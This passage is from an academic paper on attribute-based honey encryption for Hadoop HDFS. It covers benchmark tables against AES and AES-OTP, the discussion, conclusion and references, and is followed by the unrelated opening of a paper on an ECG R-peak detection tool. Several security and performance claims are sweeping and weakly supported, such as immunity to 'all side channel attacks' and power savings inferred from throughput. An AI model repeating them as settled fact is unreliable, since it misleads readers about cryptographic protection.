easy to recommend and effectively address the security deficiencies with big data clusters. Evaluation of performance of the proposed algorithm has also been done. The performance parameter includes encryption–decryption time (rate of encryption is given by encryption time and rate of decryption is given by decryption time), throughput of encryption-decryption where throughput is calculated as the size of plain text (in MB or GB) is divided by the total time during encryption-decryption. The speed and power conumption of encryption-decryption process are mainly dependent on the throughput of the encryption-decryption scheme, as it defines the speed of encryption-decryption. In case of encryption-decryption, as the throughput increases, power consumption decreases. Also, authors have compared results with the exsisting HDFS encryption algorithms namely AES and AES-OTP with different file sizes (varies from MB to GB). The performance parameters results have shown that the proposed ABHE scheme with Hadoop environment is a considerable improvement over AES, AES with OTP (Integrating with Hadoop). Also, the proposed algorithm provides the security for data stored at HDFS and distributed computing against all side channel attacks, brute force attacks and collusion attacks. Detailed description is given in the next section. RESULTS Implementation AES is propositioned to be better than the other secure approaches that address the secure data processing using Hadoop HDFS and MapReduce job in context of data encryption. To support this claim, the performance of proposed ABHE algorithm has been evaluated in this section and performance of the proposed ABHE algorithm has been compared with the existing algorithms, i.e., AES and AES-OTP, while doing the same experiment in a standard Hadoop setup. The performance is evaluated in terms of throughput and power ponsumption by doing the encryption-decryption techniques on different sizes of files (size varies from MB to GB). Implementation environment The implementations and experiments are based on Hadoop cluster. The Hadoop cluster consists of one host which runs on laptop with Intel core i3-2330M processor 2.20 GHz with Turbo Boost upto 2.93 GHz and 4GB RAM. In this, one of the host is tagged as NameNode and other is used as a DataNode. NameNode playsa role of centre point in cluster and all information about the stored data is saved on it. For simplicity, there is only one NameNode and one DataNode in a Hadoop cluster with one run. DataNode provides the physical space for storing data. The operating system of the host is Linux with CentOS 6.4, Ubuntu-14.04 (GNU/ Linux 3.13.0-24-generic x86-64). On top of the operating Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 16/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 system is Hadoop with version 2.7.3. Single node architecture of Hadoop is used in which all components of the Hadoop are on the same node. Implementation and stand-alone applications are written in Java. As Hadoop requires JDK for its working so, Java Open Java Development Kit (JDK) is installed on the system using the <apt-get>command. The running component of the Hadoop can be checked using the <jps>command. HDFS distribution process overcomes outages, acts as a backup while maximising the availability of the services. Results of the experiment In this section, we present the results and analysis of our proposed algorithm versus the available securing approaches. In the proposed encryption technique, at first, we apply the attribute based encryption which is based on cipher text policy based attribute encryption. The proposed approach uses a specific type of encrypted access control wherein user’s private-key is super imposed with an access policy over a set of attributes within the system. A user can decrypt a cipher text only if his attributes satisfy the set of rules of the respective cipher-text. An enhance security to ensure full safety against all side channel & brute force attack, the proposed algorithm is combined with Honey encryption algorithm. The combination of these two algorithms, i.e., the ABHE provides a stronger security against confidentially & brute force attack and all side channel as well as collusion attacks as encryption is not easy to break and get the actual data. The performance of ABHE has been calculated in terms of file size, encryption time, decryption time and power consumption and compared with two existing encryption algorithms namely; AES and AES with OTP applying on different sizes of text files. The working of the proposed algorithm has been demonstrated in Figs. 1 and 2. File size The proposed encryption algorithm reduces the encryption-decryption time without affecting the size of original file. Here, the file named 2048MB.txt is of size 1.12 GB and contains 9 blocks starting from 0 to 8. The size of block 0 to block 7 is remains unchanged after encryption while size of block 8 is changed from 125449781 bytes to 125449792 byte which is insignificant and shown in Figs. 3–6. Also, the output file size when encrypted a file of size 1 GB using AES, AES-OTP and the proposed approach is compared which is shown in Table 1. Encryption time using ABHE This is the time taken by encryption algorithm to produce a cipher-text from plain-text. Encryption is performed while writing the file on Hadoop so that the stored data can be saved from various attacks. This process involves a number of steps which has been shown as follows: i. HDFS client interacts with NameNode by calling the create() function on Distributed file system (DFS). ii. DFS sends a request to NameNode to create a new file. Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 17/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259 Figure 1 Working of the proposed ABHE encryption algorithm when attribute and password are en- tered for 64 MB file size (for both encryption and decryption). Full-size DOI: 10.7717/peerjcs.259/fig-1 Figure 2 Working of proposed ABHE encryption algorithm when right and wrong password are en- tered for 64 MB file size. Full-size DOI: 10.7717/peerjcs.259/fig-2 iii. NameNodes provide address of the DataNode, i.e., Slave which is based on the availability of space and capacity in DataNode on which HDFS client is going to start writing encrypted data. iv. The HDFS client starts entering the attributes to encrypt the file. After that for more security, it applies the password which is based on Honey encryption. Now the HDFS client starts writing data though FS Data OutputStream to specific slave for a specified block. Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 18/31 https://peerj.com https://doi.org/10.7717/peerjcs.259/fig-1 https://doi.org/10.7717/peerjcs.259/fig-2 http://dx.doi.org/10.7717/peerj-cs.259 Figure 3 Size Block one before encryption. Full-size DOI: 10.7717/peerjcs.259/fig-3 v. The slave starts copying the block to another slave when HDFS client has finished writing the blocks. vi. During the block copying and replication process, metadata of the file is updated in the NameNode by Datanode. (DataNode provides the periodically heartbeat signal to the NameNode). vii. After the successful completion of write operation,DataNode sends the acknowledge- ment to HDFS client through DFS. viii. After that HDFS client closes the process. ix. Write operation is closed after receiving the acknowledgement from HDFS client. The complete operation (with above steps i.e., i, ii, iii...) is explained in Fig. 7. As shown in Table 1, it took 12.9751 min for the encrypted HDFS using AES algorithm, whereas it took 11.2511 min for the encrypted HDFS using AES with OTP algorithm. On the other hand, the proposed approach took only 6.08 min to encrypt 1GB file in HDFS as shown in Table 2. Data Decryption Time using ABHE It is the time taken by decryption approach ABHE to produce the plain-text from cipher- text. With our proposed cryptographic scheme, whenever a node will try to read a file on HDFS it will first have to decrypt the file. Then only it will be allowed to perform reads operation. This has been done in the proposed approach to filter out the intruders or unauthorized access. Following is the step-by-step process on how Read operation is performed in HDFS with the proposed approach: i. First of all HDFS client interacts with NameNode by calling the read function on Distributed File System (DFS). Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 19/31 https://peerj.com https://doi.org/10.7717/peerjcs.259/fig-3 http://dx.doi.org/10.7717/peerj-cs.259 Figure 4 Size of Block one after Encryption. Full-size DOI: 10.7717/peerjcs.259/fig-4 Figure 5 Size of Block eight before encryption. Full-size DOI: 10.7717/peerjcs.259/fig-5 ii. DFS sends a request to NameNode for reading a file. iii. NameNode provides address of the DataNode, i.e., Slave on which HDFS client will start reading the data. iv. For HDFS client to start reading data through FS Data InputStream from specified slave and from a specified block, firstly it has to enter the correct password. If password does not match, the user will be treated as an intruder. If the password matches, the genuine user has to enter the private key which has already been created while encrypting the file. Again, if private key does not match, the user will not be allowed to access the file. On matching, the user will be able to successfully decrypt the file. Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 20/31 https://peerj.com https://doi.org/10.7717/peerjcs.259/fig-4 https://doi.org/10.7717/peerjcs.259/fig-5 http://dx.doi.org/10.7717/peerj-cs.259 Figure 6 Size of Block eight after encryption. Full-size DOI: 10.7717/peerjcs.259/fig-6 Table 1 File size comparison among AES and AES with OTP algorithms and the proposed ABHE algo- rithm. File size (MB) AES algorithm (MB) AES with OTP algorithm (MB) Proposed ABHE algorithm (MB) 64 96.0 74.7 64 128 192.8 149.3 128 256 384.0 298.7 256 512 768.0 597.3 512 1,024 1,536 1,228.3 1,024 v. After a successful completion of read operation, HDFS client terminates read operation. vi. Read operation is closed after receiving the acknowledgement from HDFS client. vii. As it has been shown in step 4, the proposed approach provides dual layer security to the data stored in HDFS. Step-wise demonstration of decryption operation is shown in Fig. 8. When using the proposed approach for decryption of 1GB file on Mapper job, it took 6.73 min. On the other hand, the existing algorithms, i.e., AES and AES with OTP respectively to 14.0841 and 12.2115, respectively for decrypting 1 GB file as shown in Table 3. The values for each criterion was logged and graphically plotted to represent the results as shown in Figs. 9 and 10. Further, these figures show the comparative time taken (in minutes) during the encryption and decryption process by different algorithms i.e., AES, AES with OTP and Proposed Algorithm (ABHE). From Figs. 9 and 10, it is clear that the Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 21/31 https://peerj.com https://doi.org/10.7717/peerjcs.259/fig-6 http://dx.doi.org/10.7717/peerj-cs.259 Figure 7 Writing a file with encryption in HDFS. Full-size DOI: 10.7717/peerjcs.259/fig-7 Table 2 File encryption performance comparison among AES and AES with OTP algorithms and the proposed ABHE algorithm. File size (MB) AES algorithm (Minutes) AES with OTP algorithm (Minutes) Proposed ABHE algorithm (Minutes) 64 0.8704 0.7311 0.026 128 1.8216 1.3820 0.168 256 2.7396 2.5484 0.45 512 6.6682 4.8780 1.35 1,024 12.9751 11.2511 6.08 Total Encryption Time 25.0749 20.7906 8.074 Throughput of Encryption (MB/Minutes) 79.12 95.42 245.72 proposed algorithm is taking less time for encryption and decryption as compared to other existing algorithms in Hadoop environment. When the proposed ABHE algorithm is integrated with Hadoop, it showed better performance than the previously available cryptographic algorithm. From the results of Tables 1–3, it is clear that: • The proposed algorithm ABHE is taking less time to encrypt and decrypt text files than the AES, AES with OTP algorithms. • The throughput of ABHE is very high as compared to the AES, AES with OTP algorithms. • As the throughput increases, the power consumption decreases, hence the power consumption of ABHE is low than that of the AES, AES with OTP. Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 22/31 https://peerj.com https://doi.org/10.7717/peerjcs.259/fig-7 http://dx.doi.org/10.7717/peerj-cs.259 Figure 8 Reading a File with Decryption in HDFS. Full-size DOI: 10.7717/peerjcs.259/fig-8 Table 3 File decryption performance comparison among AES and AES with OTP algorithm and the proposed ABHE algorithm. File size (MB) AES algorithm (Minutes) AES with OTP algorithm (Minutes) Proposed ABHE algorithm (Minutes) 64 1.3056 1.0950 0.03065 128 2.1859 1.6560 0.168 256 2.8641 2.6554 0.45 512 8.9494 6.5361 1.35 1,024 14.0841 12.2115 6.73 Total decryption time 29.3891 24.154 8.72865 Throughput of decryption (MB/Minutes) 67.50 82.13 227.29 Furthermore, for analyzing the performance of the proposed encryption technique with sharing data between two different DataNodes in Hadoop environment, the same has been simulated with random text file size 712 MB (in terms of block size) before and after encryption shown in Figs. 11 and 12. Also, the Browse directory show that encrypted file and abc.txt non-encrypted file HDFS in Fig. 13. DISCUSSION The proposed study has been able to successfully solve the weaknesses present in the security approaches available for big data security. The significance of the proposed work is as follows: Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 23/31 https://peerj.com https://doi.org/10.7717/peerjcs.259/fig-8 http://dx.doi.org/10.7717/peerj-cs.259 Figure 9 Encryption Time (minutes) of AES, AES with OTP and Proposed ABHE Algorithm. Full-size DOI: 10.7717/peerjcs.259/fig-9 Figure 10 Decryption Time (minutes) of AES, AES with OTP and Proposed ABHE Algorithm. Full-size DOI: 10.7717/peerjcs.259/fig-10 • Proposed encryption technique which uses the concept of Attributes Based Honey Encryption (ABHE) may help to securing sensitive information stored at HDFS in insecure environment such as the internet and cloud storages. • Proposed technique provides both HDFS and Map Reduce computation in the Hadoop as well as cloud environment to secure and preserve the integrity of data during execution Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 24/31 https://peerj.com https://doi.org/10.7717/peerjcs.259/fig-9 https://doi.org/10.7717/peerjcs.259/fig-10 http://dx.doi.org/10.7717/peerj-cs.259 Figure 11 Size of Block five before Encryption. Full-size DOI: 10.7717/peerjcs.259/fig-11 Figure 12 Size of Block five after Encryption. Full-size DOI: 10.7717/peerjcs.259/fig-12 or at rest. Therefore, we have directed our efforts in securing the data transfer and computation paradigm in Hadoop environment by using chipper text policy attributes based honey encryption and Honey encryption for secret share of tuple of data and sent them to the cloud in a secure manner. • The chipper text policy attributes based encryption makes the application secure and has a high performance when compared with the rest of the encryption techniques. Also, it provides the secure data transfer to all cloud applications. Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 25/31 https://peerj.com https://doi.org/10.7717/peerjcs.259/fig-11 https://doi.org/10.7717/peerjcs.259/fig-12 http://dx.doi.org/10.7717/peerj-cs.259 Figure 13 Browse directory show that encrypted file and abc.txt non-encrypted file HDFS. Full-size DOI: 10.7717/peerjcs.259/fig-13 • In the proposed algorithm, we have assured the data security by using simplified chipper text policy attribute based encryption with Honey encryption which is difficult to decrypt by any unauthorized access. • The user authorization access is based on the user define policy which reflects the overall organizational structure and also, depends upon a set of attributes within the system. • With the proposed algorithm, the security of data is not only dependent on the secrecy of encryption algorithm but also on the security of the key. This provides dual layer security for the data. CONCLUSION In this proposed approach, we mainly concentrated on protection of big data stored in HDFS by integrating the proposed ABHE algorithm with Hadoop key management server. In a nutshell, for ensuring data security in Hadoop environment through the proposed encryption technique, HDFS files are encrypted by using attribute based honey encryption through the proposed ABHE algorithm. For evaluating the suggested technique, we carried out some experiments using two data nodes. Our objective was to experiment and gauge the effectiveness of ABHE algorithm. For accuracy in sharing secret key, data sharing between different clients and speed with which each file stored in HDFS. As the proposed ABHE algorithm, execution time (a function of encryption time) is less as compared to the other available approaches. This proves that the proposed technique is fast enough to secure the data without adding delay. Also, the proposed ABHE algorithm has a higher throughput which proves its applicability on big data. It provides a feasible solution for secure communication between one DataNode to other DataNode. The proposed encryption technique does not increase the file size therefore it saves the memory and bandwidth, and hence reduces traffic in a network. Also, it has an ability to encrypt Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 26/31 https://peerj.com https://doi.org/10.7717/peerjcs.259/fig-13 http://dx.doi.org/10.7717/peerj-cs.259 structured as well as unstructured data under a single platform. Only HDFS client can encrypt or decrypt data with accurate attributes and password. The Proposed technique provides a dual layer security for all DataNode as data is not confined to a specific device and clients can access the system and data from anywhere. This encryption approach may be reckoned as a premise for visualizing and designing even more robust approaches to ensure optimum security of big data. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work is sponsored by Council of Science & Technology, Uttar Pradesh, India under F. No. CST/D-2408. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Council of Science & Technology, Uttar Pradesh, India. Competing Interests The authors declare there are no competing interests. Author Contributions • Gayatri Kapil conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Alka Agrawal conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • Abdulaziz Attaallah conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Abdullah Algarni performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • Rajeev Kumar and Raees Ahmad Khan conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Code is available as a Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.259#supplemental-information. Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 27/31 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.259#supplemental-information http://dx.doi.org/10.7717/peerj-cs.259#supplemental-information http://dx.doi.org/10.7717/peerj-cs.259#supplemental-information http://dx.doi.org/10.7717/peerj-cs.259 REFERENCES Atallah M, Frikken K, Blanton M. 2005. Dynamic and efficient key management for access hierarchies. In: Proc. of CCS’05. Bardi M, Xianwei Z, Shuai L, Fuhong L. 2014. Big data security and privacy: a review. China Communication 11(14):135–145 DOI 10.1109/cc.2014.7085614. Bellare M, Ristenpart T, Rogaway T, Stegers P. 2009. Format-preserving encryption. In: International workshop on selected areas in cryptography. 295–312. Cheikh AB, Abbes H, Fedak G. 2014. Towards privacy for MapReduce on hybrid clouds using information dispersal algorithm. In: Data management in cloud, Grid and P2P systems—7th international conference, Globe 2014, Munich, Germany, September 2–3. Proceedings, Munich, Germany, 2014. 37–48. Choi H, Nam H, Hur J. 2017. Password typos resilience in honey encryption. In: IEEE international conference in information networking (ICOIN). 593–598. Cohen JC, Acharya S. 2014. Toward a trusted HDFS storage platform: mitigating threats to Hadoop infrastructure using hardware-accelerated encryption with TPM-rooted key protection. Journal of Information Security and Applications 19(3):224–244. Colombo P, Ferrari E. 2018. Access control in the era of big data: state of the art and research directions. In: Blue sky session: innovation in access control and privacy-aware data management for big data and IoT, SACMAT’18, June 13–15. Derbeko P, Dolev S, Gudes E, Sharm S. 2016. Security and privacy aspects in mapre- duce on clouds: a survey. Journal Computer Science Review 20(no. c):1–28 DOI 10.1016/j.cosrev.2016.05.001. Dinh TTA, Saxena P, Cang E-C, Ooi BC, Zhang C. 2015. M2R: enabling stronger privacy in MapReduce computation. In: Proceedings of the 24th USENIX security symposium (Security). Washington, DC. Dolev S, Gupta P, Li Y, Mehrotra S, Sharma S. 2018. Privacy-preserving secret shared computations using mapreduce. Available at https://arxiv.org/abs/1801.10323. Dyer KP, Coull SE, Ristenpart T, Shrimpton T. 2013. Protocol misidentification made easy with format-transforming encryption. In: Proceedings of the ACM SIGSAC conference on computer and communications security. ACM, 61–72. Ebrahim M, Khan S, Khalid UB. 2013. Khalid UB Symmetric algorithm survey: a comparative analysis. International Journal of Computer Applications 61(20):12–19. Fu X, Gao Y, Luo B, Du X, Guizani M. 2017. Security threats to hadoop: data leakage attacks and investigation. IEEE Network 31(2):67–71 DOI 10.1109/MNET.2017.1500095NM. Gupta M, Patwa F, Sandhu R. 2018. Attribute-based access control model for secure big data processing in hadoop ecosystem. In: Processing’s of the third acm workshop on attribute-based access control-ABAC-18. 13–24 DOI 10.1145/3180457.3180463. Jain P, Sardana A. 2012. Defending against internet worms using honey farm. In: ACM in proceedings of the CUBE international information technology conference. New York: ACM, 795–800. Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 28/31 https://peerj.com http://dx.doi.org/10.1109/cc.2014.7085614 http://dx.doi.org/10.1016/j.cosrev.2016.05.001 https://arxiv.org/abs/1801.10323 http://dx.doi.org/10.1109/MNET.2017.1500095NM http://dx.doi.org/10.1145/3180457.3180463 http://dx.doi.org/10.7717/peerj-cs.259 Jam MR, Akbari MK, Khanli LM. 2014. A survey on security of hadoop. In: 4th interna- tional conference on computer and knowledge engineering (ICCKE). 716–721. Jeong YS, Kim YT. 2015. A token-based authentication security scheme for hadoop distributed file system using elliptic curve cryptography. Journal of Computer Virology and Hacking Techniques 11:137–142 DOI 10.1007/s11416-014-0236-5. Juels A, Ristenpart T. 2014. Honey encryption: security beyond the brute-force bound. In: Advances in Cryptology-EUROCRYPT2014. 293–310. Kim IS, Kim MH. 2012. Agent-based honey net framework for protecting servers in cam- pus networks. IET Information Security 6(3):202–211 DOI 10.1049/iet-ifs.2011.0154. Lu W, Wang Y, Juang J, Liu J, Shen Y, Wei B. 2017. Hybrid storage architecture and efficient MapReduce processing for unstructured data. Parallel Computing 69:63–77 DOI 10.1016/j.parco.2017.08.008. Maheswari MI, Revathy S, Tamilarasi R. 2016. Secure data transmission for multi sharing in big data storage. Indian Journal of Science and Technology 9(21) DOI 10.17485/ijst/2016/v9i21/95164. Mahmoud H, Hegazy A, Khafagy MH. 2018. An approach for big data security based on hadoop distributed file system. In: International conference on innovative trends in computer engineering (ITCE). DOI 10.1109/ITCE.2018.8316608. Mehmood A, Natgunanathan I, Xiang Y. 2016. Protection of big data privacy. In: IEEE protection of big data privacy, in IEEE access, vol. 4. Piscataway: IEEE, 1821–1834 DOI 10.1109/ACCESS.2016.2558446. Mohan Rao PR, Krishna SM, Kumar APS. 2018. Privacy preservation techniques in big data analytics: a survey. Journal of Big Data 5:Article 33 DOI 10.1186/s40537-018-0141-8. Nguyen TC, Shen W, Jiang J, Xu W. 2013. A novel data encryption in HDFS, 2013 IEEE international conference on green computing and communications and IEEE internet of things and IEEE cyber. Physical and Social Computing 2013:2183–2187 DOI 10.1109/GreenCom-iThings-CPSCom.2013.4. Oktay Y, Mehrotra S, Khadilkar V, Kantarcioglu M. 2015. SEMROD: secure and efficient MapReduce over hybrid clouds. In: Proceedings of the 2015 ACM SIGMOD international conference on management of data, Melbourne, Victoria, Australia, May 31—June 4, 2015. 153–166. Owezarski P. 2015. A near real-time algorithm for autonomous identification and characterization of honey pot attacks. In: Proceedings of the 10th ACM symposium on information, computer and communications security. 531–542. Park S, Lee Y. 2013. Secure hadoop with encrypted HDFS. In: Park JJ, Arabnia HR, Kim C, Shi W, Gil JM, eds. Grid and pervasive computing. GPC 2013. Lecture notes in computer science, vol. 7861. Berlin, Heidelberg: Springer DOI 10.1007/978-3-642-38027-3_14. Polato I, Re R, Goldmn A, Kon F. 2014. A comprehensive view of hadoopreseach—a systematic literature review. Journal of Network and Computer Applications 46:1–25 DOI 10.1016/j.jnca.2014.07.022. Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 29/31 https://peerj.com http://dx.doi.org/10.1007/s11416-014-0236-5 http://dx.doi.org/10.1049/iet-ifs.2011.0154 http://dx.doi.org/10.1016/j.parco.2017.08.008 http://dx.doi.org/10.17485/ijst/2016/v9i21/95164 http://dx.doi.org/10.1109/ITCE.2018.8316608 http://dx.doi.org/10.1109/ACCESS.2016.2558446 http://dx.doi.org/10.1186/s40537-018-0141-8 http://dx.doi.org/10.1109/GreenCom-iThings-CPSCom.2013.4 http://dx.doi.org/10.1007/978-3-642-38027-3_14 http://dx.doi.org/10.1016/j.jnca.2014.07.022 http://dx.doi.org/10.7717/peerj-cs.259 Rerzi DS, Terzi R, Sagiroglu S. 2015. A survey on security and privacy issues in big data. In: 10th international conference for internet technology and secured transactions (ICITST). 202–207 DOI 10.1109/jicitst.2015.7412089. Schuster F, Costa M, Fournet C, Gkantsidis C, Peinado M, Mainar-Ruiz G, Russinovich M. 2015. VC3: trustworthy data analytics in the cloud using SGX. In: Proceedings of the 36th IEEE symposium on security and privacy (Oakland). 38–54. Scrinivasan MK, Revthy P. 2018. State-of-the-art big data security taxonomies. In: Proceeding of the 11th innovation in software engineering conference—ISEC. DOI 10.1145/31728771.317288. Shobha K, Nickolas S. 2017. Time domain attribute based encryption for big data access control in cloud environment. ACCENTS Transactions on Information Security 2(7):73–77 DOI 10.19101/TIS.2017.27003. Song Y, Shin YS, Jang M, Chang JW. 2017. Design and implementation of HDFS data encryption scheme using ARIA algorithm on Hadoop. In: IEEE international confer- ence on big data and smart computing (BigComp) DOI 10.1109/BIGCOMP.2017.7881720. Sudhakar K, Farquad MAH, Narshimha G. 2019. Effective convolution method for privacy preserving in cloud over big data using map reduce framework. IET Software 13:187–194 DOI 10.1049/iet-sen.2018.5258. Tan SF, Samsudin A. 2018. Enhanced security of internet banking authentication with extended honey encryption (XHE) scheme. In: Zelinka I, Vasant P, Duy V, Dao T, eds. Innovative computing, optimization and its applications. Studies in computational intelligence, vol. 741. Cham: Springer DOI 10.1007/978-3-319-66984-7_12. Tian Y. 2017. Towards the development of best data security for big data. Communication and Network 9:291–301 DOI 10.4236/cn.2017.94020. Tyagi N, Wang J, Wen K, Zuo D. 2015. Honey encryption applications. Network Security 2015:1–16. Ulusoy H, Kantarcioglu M, Pattuk E, Hamlen K. 2014. Vigiles: fine-grained access control for MapReduce systems. In: 2014 IEEE international congress on big data Anchorage, AK, 2014, 40–47 DOI 10.1109/BigData.Congress.2014.16. Usama M, Zakaria N. 2018. Chaos-based simultaneous compression and encryption for Hadoop. PLOS ONE 13(3):e0195420 DOI 10.1371/journal.pone.0195420. Varsha BS, Suryateja PS. 2014. Using attribute- based encryption with advanced encryption standard for secure and scalable sharing of personal health records in cloud. International Journal of Computer Science and Information Technologies 5(5):6395–6399. Vimercati SDC, Foresti S, Jajodia S, Paraboschi S, Samarati P. 2007. Over-encryption: management of access control evolution on outsourced data. In: Proc. of VLDB’07. Vinayak PP, Nahala MA. 2015. Avoiding brute force attack in manet using honey encryption. International Journal of Science and Research 4(3):83–85. Vormetric Data Security. 2016. Hadoop: security recommendation for Hadoop environments. Available at https://securosis.com/assets/library/reports/Securing_ Hadoop_Final_V2.pdf . Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 30/31 https://peerj.com http://dx.doi.org/10.1109/jicitst.2015.7412089 http://dx.doi.org/10.1145/31728771.317288 http://dx.doi.org/10.19101/TIS.2017.27003 http://dx.doi.org/10.1109/BIGCOMP.2017.7881720 http://dx.doi.org/10.1049/iet-sen.2018.5258 http://dx.doi.org/10.1007/978-3-319-66984-7_12 http://dx.doi.org/10.4236/cn.2017.94020 http://dx.doi.org/10.1109/BigData.Congress.2014.16 http://dx.doi.org/10.1371/journal.pone.0195420 https://securosis.com/assets/library/reports/Securing_Hadoop_Final_V2.pdf https://securosis.com/assets/library/reports/Securing_Hadoop_Final_V2.pdf http://dx.doi.org/10.7717/peerj-cs.259 Wang Y, Shen Y, Wang H, Cao J, Jiang X. 2015. MtMR: ensuring MapReduce compu- tation integrity with merkle tree-based verifications. IEEE Transactions on Big Data 4(3):418–431 DOI 10.1109/TBDATA.2016.2599928. Wikipedia. 2019. Honey encryption. Available at https://en.m.wikipedia.org/wiki/Honey_ encryption. Xu L, Wu X, Zhang X. 2012. CL-PRE: a certificate less proxy re-encryption scheme for secure data sharing with public cloud. In: ACM symposium on information, computer and communications security (ASIACCS’12). New York: ACM, 87–88. Yalla C, Gill A, Gupta M, Mohankumar H, McCloskey T, Minas L, Ngo N, Tolentino S, Watson D. 2016. Big Data: security Intel IT’s apache hadoop platform. White paper, Intel. Available at https://www.intel.com/content/www/us/en/it-management/intel- it-best-practices/big-data-securing-intel-it-apache-hadoop-platform-paper.html. Yang C, Lin W, Liu M. 2013. A novel triple encryption scheme for hadoop-based cloud data security. In: Emerging intelligent data and web technologies (EIDWT), Fourth international conference. 437–442. Yin W, lska JI, Zhou H. 2017. Protecting private data by honey encryption. Hindawi Se- curity and Communication Networks 2017:Article 6760532 DOI 10.1155/2017/6760532. Yu S, Wang C, Ren K, Lou W. 2010a. Achieving secure, scalable, and fine-grained access control in cloud computing. In: Proc. of IEEE INFOCOM’10. San Diego. Yu S, Wang C, Ren K, Lou W. 2010b. Achieving secure, scalable, and fine-grained data access control in cloud computing. Communications Society IEEE INFOCOM. Zettaset. 2014. The big data security gap: protecting the Hadoop cluster. White Paper. Available at https://www.zettaset.com/wp-content/uploads/2014/04/zettaset_wp_ security_0413.pdf . Zhao J, Wang L, Tao J, Chen J, Sun W, Ranjan R, Kolodziej J, Streit A, Georgakopoulos D. 2014. A security framework in G-Hadoop for big data computing across dis- tributed Cloud data centres. Journal of Computer and System Sciences 80:994–1007 DOI 10.1016/j.jcss.2014.02.006. Zhao T, Wei L, Zhang C. 2016. Attribute- based encryption scheme based on SIFF. In: IEEE ICC 2016 communication and information system security symposium. Zhou H, Wen Q. 2014. Data security accessing for hdfs based on attribute-group in cloud computing. In: International conference on logistics engineering, management and computer science. 1142–1145. Kapil et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.259 31/31 https://peerj.com http://dx.doi.org/10.1109/TBDATA.2016.2599928 https://en.m.wikipedia.org/wiki/Honey_encryption https://en.m.wikipedia.org/wiki/Honey_encryption https://www.intel.com/content/www/us/en/it-management/intel-it-best-practices/big-data-securing-intel-it-apache-hadoop-platform-paper.html https://www.intel.com/content/www/us/en/it-management/intel-it-best-practices/big-data-securing-intel-it-apache-hadoop-platform-paper.html http://dx.doi.org/10.1155/2017/6760532 https://www.zettaset.com/wp-content/uploads/2014/04/zettaset_wp_security_0413.pdf https://www.zettaset.com/wp-content/uploads/2014/04/zettaset_wp_security_0413.pdf http://dx.doi.org/10.1016/j.jcss.2014.02.006 http://dx.doi.org/10.7717/peerj-cs.259 work_p2cpwlday5ajnd3ik2thxkavae ---- R-DECO: an open-source Matlab based graphical user interface for the detection and correction of R-peaks R-DECO: an open-source Matlab based graphical user interface for the detection and correction of R-peaks Jonathan Moeyersons1, Matthew Amoni2,3, Sabine Van Huffel1, Rik Willems2,3 and Carolina Varon1 1 STADIUS Center for Dynamical Systems, Signal Processing and Data Analytics, Department of Electrical Engineering (ESAT), KU Leuven, Leuven, Belgium 2 Department of Cardiovascular Sciences, KU Leuven, Leuven, Belgium 3 Department of Cardiology, University Hospitals Leuven, Leuven, Belgium ABSTRACT Many of the existing electrocardiogram (ECG) toolboxes focus on the derivation of heart rate variability features from RR-intervals. By doing so, they assume correct detection of the QRS-complexes. However, it is highly likely that not all detections are correct. Therefore, it is recommended to visualize the actual R-peak positions in the ECG signal and allow manual adaptations. In this paper we present R-DECO, an easy-to-use graphical user interface (GUI) for the detection and correction of R-peaks. Within R-DECO, the R-peaks are detected by using a detection algorithm which uses an envelope-based procedure. This procedure flattens the ECG and enhances the QRS-complexes. The algorithm obtained an overall sensitivity of 99.60% and positive predictive value of 99.69% on the MIT/BIH arrhythmia database. Additionally, R-DECO includes support for several input data formats for ECG signals, three basic filters, the possibility to load other R-peak locations and intuitive methods to correct ectopic, wrong, or missed heartbeats. All functionalities can be accessed via the GUI and the analysis results can be exported as Matlab or Excel files. The software is publicly available. Through its easy-to-use GUI, R-DECO allows both clinicians and researchers to use all functionalities, without previous knowledge. Subjects Computational Biology, Algorithms and Analysis of Algorithms, Data Science, Graphics, Visual Analytics Keywords R-peak detection, R-peak correction, User interface, Analysis software INTRODUCTION The electrocardiogram (ECG) is one of the primary screening and diagnostic tools of the cardiologist. It records the electrical activity of the heart, which generates the myocardial contractions. A crucial step in the study of the ECG is the location of the QRS-complexes. As can be seen in Fig. 1, these complexes are the most prominent waveforms in the ECG. They contain an enormous amount of information about the state of the heart. This is why the detection of the QRS-complexes constitutes the basis for almost all automated ECG analysis algorithms (Kohler, Hennig & Orglmeister, 2002). Once these have been identified, more elaborated analyses can be performed, such as heart rate variability (HRV). How to cite this article Moeyersons J, Amoni M, Van Huffel S, Willems R, Varon C. 2019. R-DECO: an open-source Matlab based graphical user interface for the detection and correction of R-peaks. 